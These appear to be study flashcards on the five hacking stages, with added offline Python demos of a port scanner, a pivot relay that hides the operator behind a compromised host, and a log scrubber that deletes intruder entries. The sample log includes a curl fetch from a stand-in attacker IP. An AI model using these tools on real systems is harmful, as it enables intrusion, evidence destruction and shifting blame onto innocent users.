Hacking Stages Flashcards

1
Q

What is the initial phase?

A

Reconnaissance is the initial phase. This step involves gathering information to learn as much as possible about the target.

There are two types of information gathering -
Active and Passive

  • Active information gathering requires some level of interaction w/ the target
  • Passive information gathering does not require interaction w/ the target

Passive Ex.

  • If you’re sitting at a bar and eavesdropping on a business-related conversation your target is having w/ another individual, that qualifies as passive information gathering, because it requires no direct interaction w/ the target
  • Intercepting communications your target is having w/ another person over a channel (a network attack, e.g. sniffing traffic) is generally also passive information gathering, though some interception techniques do require interacting w/ the target and would then count as active

Active Ex.

  • Say you’re at the same bar as before, except this time you buy both your target and the individual they’re speaking with a few drinks and get them drunk in order to more easily extract the information; this qualifies as active information gathering because it requires that you interact w/ the target
  • Another example of active information gathering is a phishing scheme. You send a link to your target via email or some other channel; when they click it, their browser connects to a server you control, giving up their IP address and possibly revealing some substantial information (and whatever they then type into your page).
2
Q

What is the second phase?

A

Scanning:
During this stage, hackers use the information they gathered in the reconnaissance phase to scan the target network for more specific information.

Ex. for understanding the difference between the reconnaissance phase and the scanning phase:
- Say you are conducting a penetration test on a company; what are the first pieces of information you need in order to begin scanning the entry point into their network? For instance, if you wanted to test the configuration of a firewall (what can pass through and what cannot), the very least you would need is an IP address (or more likely, several IP addresses) relevant to that firewall.
Or you might need something like the physical address where the servers are located.
These two pieces of information are acquired during the reconnaissance phase; in the scanning phase you act on them to acquire more specific and applicable data (e.g. which hosts answer, which ports the firewall lets through, and what services are listening on them).

In easier terms:

Reconnaissance phase (first stage):
- acquire as much relevant information and data as possible
Scanning phase (second stage):
- using the information acquired in the reconnaissance phase, gather even more specific information (live hosts, open ports, running services, and from those the vulnerabilities you will try to exploit)
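A minimal TCP connect scan, added here as an example and not part of the original flashcards, shows what "more specific information" means in practice: for each port it reports open (the three-way handshake completed, so a service is listening), closed (the host answered with a reset, so it is up but nothing listens there) or filtered (no answer at all, which is what a firewall dropping the packet looks like from outside). It starts its own throwaway listener on 127.0.0.1 so it runs offline; the host, port list and timeout are the parameters you would point at the addresses found during reconnaissance.

```python
import socket
import threading

def start_listener(host="127.0.0.1"):
    """Start a throwaway TCP service on an ephemeral port (a constructed
    stand-in for a real target, so the scan below runs offline)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:        # listener closed: stop serving
                break
            conn.close()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, port

def reserve_closed_port(host="127.0.0.1"):
    """Find a port nothing listens on: bind, read the number, release it."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind((host, 0))
    port = s.getsockname()[1]
    s.close()
    return port

def probe(host, port, timeout=1.0):
    """TCP connect() probe of a single port.

    open     - handshake completed, a service is listening
    closed   - host answered with RST: it is up, nothing listens there
    filtered - no answer within the timeout (or unreachable): something
               between us and the host, typically a firewall, dropped it
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return "open"
    except socket.timeout:
        return "filtered"
    except ConnectionRefusedError:
        return "closed"
    except OSError:
        return "filtered"
    finally:
        s.close()

def scan(host, ports, timeout=1.0):
    """Probe each port in turn and return {port: state}."""
    return {p: probe(host, p, timeout) for p in ports}

if __name__ == "__main__":
    srv, open_port = start_listener()
    closed_port = reserve_closed_port()
    for p, state in scan("127.0.0.1", [open_port, closed_port]).items():
        print(f"127.0.0.1:{p} {state}")
    srv.close()
```

This is what `nmap -sT` does; a SYN scan (`nmap -sS`) needs raw sockets and never completes the handshake, which is why a connect scan is the noisier of the two: every open port you find has accepted a full connection from your address and may have logged it, which matters for the later "clearing tracks" stage.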
3
Q

What is the third phase?

A

Gaining access:
This phase involves finding an entry point to the target’s operating system or an application on the system and using it to perform the attack.

  • this is the stage in which the actual attack takes place (you exploit the vulnerabilities you’ve discovered in the previous stages)
4
Q

What is the fourth phase?

A

Maintaining access:
This is the phase in which hackers attempt to maintain their admin/root privileges so they can continue to utilize the system.

  • once you’ve broken into a system, your next step will likely be to elevate your own privileges so you can do even more within the system.
  • you’ll need to ensure that you have persistent access to the system/device you’ve compromised, because if your connection is broken for any reason and you have no easy way of re-entering the system, a considerable amount of time is lost
  • you can install tools onto a compromised device that will give you persistent access and will continuously gather data from the machine which can then be used later on to possibly compromise other devices within the network, internet accounts, etc.
  • Ex: a key logger can be installed which will harvest what the user of the compromised device types into the keyboard, so you can learn more about what that particular user is doing on that particular device
  • you can use the machine you’ve compromised as a proxy within the company. You then perform actions elsewhere through that machine, and if those actions are ever traced, they will only be traced back to the machine you used as a proxy and to its owner (if you cover your tracks very well and leave no evidence of any outside involvement, a heavy amount of suspicion will more than likely fall on that machine’s owner, along with legal repercussions)
    As an ethical hacker, make sure to document these things so that you don’t get anyone into legal trouble, and after a penetration test is concluded, do not forget to include them in your report, so as to clear all personnel of any liability.
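Using a compromised machine as a proxy, as an added example (not from the original cards): a small TCP relay that, run on the foothold, accepts connections on one port and forwards each one to an internal host. The internal service records the peer address it sees, which is the relay's address, not the operator's; that is exactly why a trace ends at the pivot and its owner. Both ends are constructed stand-ins on 127.0.0.1 so the example runs offline; `target_host`/`target_port` stand for whatever internal address the foothold can reach.

```python
import socket
import threading

def _pipe(src, dst):
    """Copy bytes src -> dst until src hits EOF, then half-close dst so the
    far side sees the EOF too."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass

def start_relay(target_host, target_port, listen_host="127.0.0.1"):
    """Pivot: listen on an ephemeral port and forward every connection to
    (target_host, target_port). Returns (listening socket, port)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def accept_loop():
        while True:
            try:
                client, _ = srv.accept()
            except OSError:            # relay shut down
                break
            upstream = socket.create_connection((target_host, target_port))
            threading.Thread(target=_pipe, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pipe, args=(upstream, client), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, port

def start_internal_service(host="127.0.0.1"):
    """Constructed stand-in for an internal host: echoes what it receives and
    records the peer address of each connection (what its logs would show).
    Returns (listening socket, port, list of peers seen)."""
    seen = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def handle(conn, peer):
        seen.append(peer)
        with conn:
            while True:
                data = conn.recv(4096)
                if not data:
                    break
                conn.sendall(data)

    def accept_loop():
        while True:
            try:
                conn, peer = srv.accept()
            except OSError:
                break
            threading.Thread(target=handle, args=(conn, peer), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv, port, seen

def send_via_relay(relay_port, payload, relay_host="127.0.0.1"):
    """Operator side: talk to the internal service through the pivot.
    Returns (reply bytes, the operator's own socket address)."""
    with socket.create_connection((relay_host, relay_port)) as c:
        origin = c.getsockname()
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)           # EOF travels relay -> service
        chunks = []
        while True:
            data = c.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks), origin

if __name__ == "__main__":
    svc, svc_port, seen = start_internal_service()
    relay, relay_port = start_relay("127.0.0.1", svc_port)
    reply, origin = send_via_relay(relay_port, b"hello")
    print(reply, "operator socket:", origin, "service saw:", seen[0])
    relay.close(); svc.close()
```

The address the service records (`seen[0]`) belongs to the relay's outbound socket, not to the operator's socket (`origin`); on a real network that difference is the pivot host's IP versus yours, and it is what the flashcard means by actions being "traced back to the machine you've used as a proxy".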
5
Q

What is the fifth phase?

A

Clearing tracks:
This is the final phase. During this step, hackers attempt to hide their activities on the system. They do everything they can to cover their tracks and avoid being caught.

  • does not refer only to when your work is done. You should clear your tracks throughout all prior stages. It’s especially important that once you’ve breached a system and created some sort of permanent access, you remain undetected. If you are detected, the target company will likely conduct an investigation, discover your entry point, and close it. Any machines you’ve infected up to the point of your detection will probably be purged, and just like that, you’ve lost all access.
  • erase all tracks as fast as possible, and if possible, generate no tracks at all

Actions that can be taken to clear your tracks are as follows (but not limited to):
- clearing log files. Just note that you shouldn’t purge everything within a log file, only the entries that prove your presence in a system; an emptied or truncated log is itself a red flag to an investigator
- masquerading your activities behind legitimate programs. By mimicking the activities and behavior of legitimate programs and blending your own actions in with them, you can hide yourself.
Ex. Erman’s key logger masquerades itself behind legitimate programs by using the same set of hooks that practically any legitimate program with keyboard shortcuts would use. So, if the antivirus were to detect it as a key logger, it would also have to flag basically every program on the system that uses keyboard shortcuts
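Selective clearing, as an added example (not the flashcards' own material): `scrub()` drops only the entries that mention a chosen marker, here the source IP used for the intrusion, and leaves every other line intact, while `missing_from_local()` is the defender's counter-check, comparing the host's log against a copy that was forwarded to a remote log server before the scrub. The auth.log-style lines are constructed for the example; 203.0.113.45 is a documentation address standing in for the attacker.

```python
# Constructed auth.log-style sample (not from a real host). 203.0.113.45 is
# the documentation address standing in for the intruder's source IP.
SAMPLE_LOG = """\
Mar 10 09:12:01 web1 sshd[2201]: Accepted publickey for deploy from 10.0.0.7 port 51022 ssh2
Mar 10 09:12:05 web1 sudo:   deploy : TTY=pts/0 ; PWD=/home/deploy ; USER=root ; COMMAND=/bin/systemctl restart nginx
Mar 10 09:40:33 web1 sshd[2310]: Failed password for root from 203.0.113.45 port 40122 ssh2
Mar 10 09:40:35 web1 sshd[2310]: Failed password for root from 203.0.113.45 port 40122 ssh2
Mar 10 09:40:41 web1 sshd[2310]: Accepted password for root from 203.0.113.45 port 40122 ssh2
Mar 10 09:41:02 web1 sudo:     root : TTY=pts/1 ; PWD=/root ; USER=root ; COMMAND=/usr/bin/curl http://203.0.113.45/x
Mar 10 10:02:17 web1 CRON[2400]: pam_unix(cron:session): session opened for user root by (uid=0)
"""

def scrub(log_text, marker):
    """Remove only the entries that contain `marker`; keep everything else
    unchanged and in order. Returns (cleaned text, list of removed lines)."""
    kept, removed = [], []
    for line in log_text.splitlines():
        (removed if marker in line else kept).append(line)
    return "\n".join(kept) + "\n", removed

def missing_from_local(local_text, forwarded_text):
    """Defender's check: entries present in the remotely forwarded copy of
    the log but absent from the host's own file, in forwarded order."""
    local = set(local_text.splitlines())
    return [line for line in forwarded_text.splitlines() if line not in local]

if __name__ == "__main__":
    cleaned, removed = scrub(SAMPLE_LOG, "203.0.113.45")
    print(f"removed {len(removed)} entries, kept {len(cleaned.splitlines())}")
    for line in missing_from_local(cleaned, SAMPLE_LOG):
        print("MISSING LOCALLY:", line)
```

Two things the sample makes visible. The `sudo` line only gets caught because the IP happens to appear in the curl URL; an entry that records the intruder's activity without carrying the marker survives a text scrub, as do things a text filter never touches (shell history, the binary wtmp/btmp login records). And once the log has been shipped off the host, local editing changes nothing the defender relies on: the forwarded copy still holds every removed line, and the comparison returns exactly them.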
